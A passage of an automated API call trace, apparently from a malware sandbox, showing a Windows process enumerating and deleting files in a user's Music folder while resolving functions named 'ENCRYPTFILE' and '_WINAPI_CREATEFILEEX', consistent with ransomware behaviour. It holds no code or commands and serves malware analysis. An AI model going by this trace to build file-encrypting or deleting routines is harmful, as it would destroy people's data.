0x43ca598 [0116.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0116.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0116.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0116.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0116.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0116.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0116.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0116.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b28 [0116.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0116.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xb0) returned 0x42d9380 [0116.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a46a0 [0116.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a4ae0 [0116.728] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\RjvHKIDt9\\evi6Nl1 g1KyY\\-a1fx91SeT 48T\\kEfh1XIhHEyxIZI.m4a", lpFindFileData=0x144ead0 | out: lpFindFileData=0x144ead0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb787e6b0, ftCreationTime.dwHighDateTime=0x1d5e99a, ftLastAccessTime.dwLowDateTime=0x9ec83740, ftLastAccessTime.dwHighDateTime=0x1d5ea37, ftLastWriteTime.dwLowDateTime=0x9ec83740, ftLastWriteTime.dwHighDateTime=0x1d5ea37, nFileSizeHigh=0x0, nFileSizeLow=0xbb73, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="kEfh1XIhHEyxIZI.m4a", cAlternateFileName="KEFH1X~1.M4A")) returned 0x41ac600 [0116.728] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\RjvHKIDt9\\evi6Nl1 g1KyY\\-a1fx91SeT 48T\\kEfh1XIhHEyxIZI.m4a" (normalized: "c:\\users\\fd1hvy\\music\\rjvhkidt9\\evi6nl1 g1kyy\\-a1fx91set 48t\\kefh1xihheyxizi.m4a")) returned 1 [0116.770] FindNextFileW (in: hFindFile=0x41ac600, lpFindFileData=0x144ead0 | out: lpFindFileData=0x144ead0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb787e6b0, ftCreationTime.dwHighDateTime=0x1d5e99a, ftLastAccessTime.dwLowDateTime=0x9ec83740, ftLastAccessTime.dwHighDateTime=0x1d5ea37, ftLastWriteTime.dwLowDateTime=0x9ec83740, ftLastWriteTime.dwHighDateTime=0x1d5ea37, nFileSizeHigh=0x0, nFileSizeLow=0xbb73, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="kEfh1XIhHEyxIZI.m4a", cAlternateFileName="KEFH1X~1.M4A")) returned 0 [0116.770] FindClose (in: hFindFile=0x41ac600 | out: hFindFile=0x41ac600) returned 1 [0116.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a4ae0 | out: hHeap=0x1780000) returned 1 [0116.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0116.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0116.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0116.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x42da298 | out: hHeap=0x1780000) returned 1 [0116.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0116.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0116.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0116.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0116.771] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0116.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac540 | out: hHeap=0x1780000) returned 1 [0116.771] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0116.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0116.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0116.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0116.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0116.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0116.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0116.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0116.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0116.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0116.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cc1c8 | out: hHeap=0x1780000) returned 1 [0116.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0116.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0116.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0116.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0116.771] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0116.771] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0116.771] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0116.772] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0116.772] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0116.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0116.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0116.772] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0116.772] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2690 [0116.772] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0116.772] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0116.772] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0116.772] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0116.772] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0116.772] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0116.772] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0116.772] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0116.772] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5030 [0116.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0116.772] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0116.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0116.772] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0116.772] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x140) returned 0x43cc1c8 [0116.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5030 | out: hHeap=0x1780000) returned 1 [0116.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0116.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0116.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0116.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0116.772] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca5e0 [0116.772] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0116.772] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0116.772] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0116.773] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0116.773] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0116.773] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8be8 [0116.773] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0116.773] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0116.773] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0116.773] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0116.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0116.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0116.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0116.773] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0116.773] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0116.773] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0116.773] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0116.773] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0116.773] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0116.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0116.773] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\RjvHKIDt9\\evi6Nl1 g1KyY\\-a1fx91SeT 48T\\mzZHZq983SYlb.mp3", lpFindFileData=0x144e970 | out: lpFindFileData=0x144e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec66c2c0, ftCreationTime.dwHighDateTime=0x1d5ec1a, ftLastAccessTime.dwLowDateTime=0x880af980, ftLastAccessTime.dwHighDateTime=0x1d5e79d, ftLastWriteTime.dwLowDateTime=0x880af980, ftLastWriteTime.dwHighDateTime=0x1d5e79d, nFileSizeHigh=0x0, nFileSizeLow=0x708a, dwReserved0=0x10189fc, dwReserved1=0x8, cFileName="mzZHZq983SYlb.mp3", cAlternateFileName="MZZHZQ~1.MP3")) returned 0x41ac540 [0116.773] FindClose (in: hFindFile=0x41ac540 | out: hFindFile=0x41ac540) returned 1 [0116.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0116.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0116.774] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0116.774] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0116.774] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fe8 [0116.774] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0116.774] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43918c0 [0116.774] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0116.774] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43918c0 | out: hHeap=0x1780000) returned 1 [0116.774] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0116.774] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0116.774] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e26f0 [0116.774] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0116.774] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0116.774] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0116.774] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0116.774] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0116.774] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca598 [0116.774] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0116.774] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0116.774] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0116.774] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0116.774] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff18 [0116.774] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0116.774] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0116.774] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9338 [0116.774] PeekMessageW (in: lpMsg=0x144ea0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ea0c) returned 0 [0116.774] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff90 [0116.774] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0116.774] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0116.774] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0116.774] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0116.775] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0116.775] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0116.775] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0116.775] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391c78 [0116.775] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0116.775] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391c78 | out: hHeap=0x1780000) returned 1 [0116.775] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0116.775] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0008 [0116.775] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2720 [0116.775] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdd8 [0116.775] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0116.775] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0116.775] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0116.775] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0116.775] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2630 [0116.775] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0116.775] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0116.775] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0116.775] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2640 [0116.775] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0116.775] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0116.775] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0116.775] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caa78 [0116.775] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe78 [0116.775] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0116.775] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0116.775] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0116.775] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00a8 [0116.776] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0116.776] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0116.776] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfec8 [0116.776] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0116.776] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0116.776] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0116.776] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe00 [0116.776] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0116.776] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0116.776] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0116.776] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0116.776] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0116.776] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0116.776] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0116.776] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff40 [0116.776] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0116.776] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0116.776] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0116.776] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0116.776] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0116.776] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0116.776] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0116.776] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0116.776] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0116.776] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391e00 [0116.776] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0116.776] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0116.776] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0116.776] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0116.777] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0116.777] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2910 [0116.777] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0116.777] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0238 [0116.777] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0116.777] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0116.777] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0116.777] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfea0 [0116.777] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0116.777] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0116.777] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0116.777] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe50 [0116.777] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0116.777] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0116.777] PeekMessageW (in: lpMsg=0x144e4f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e4f4) returned 0 [0116.777] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0210 [0116.777] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0116.777] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0116.777] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0116.777] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0116.777] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0116.777] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0116.777] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffe0 [0116.777] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0116.777] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0116.777] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0116.777] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0116.777] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0116.777] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0116.778] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0116.778] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0116.778] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0116.778] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0116.778] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0116.778] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0116.778] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0116.778] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0116.778] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0116.778] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0116.778] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0116.778] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0116.778] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0116.778] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0116.778] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0116.778] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0116.778] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0116.778] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 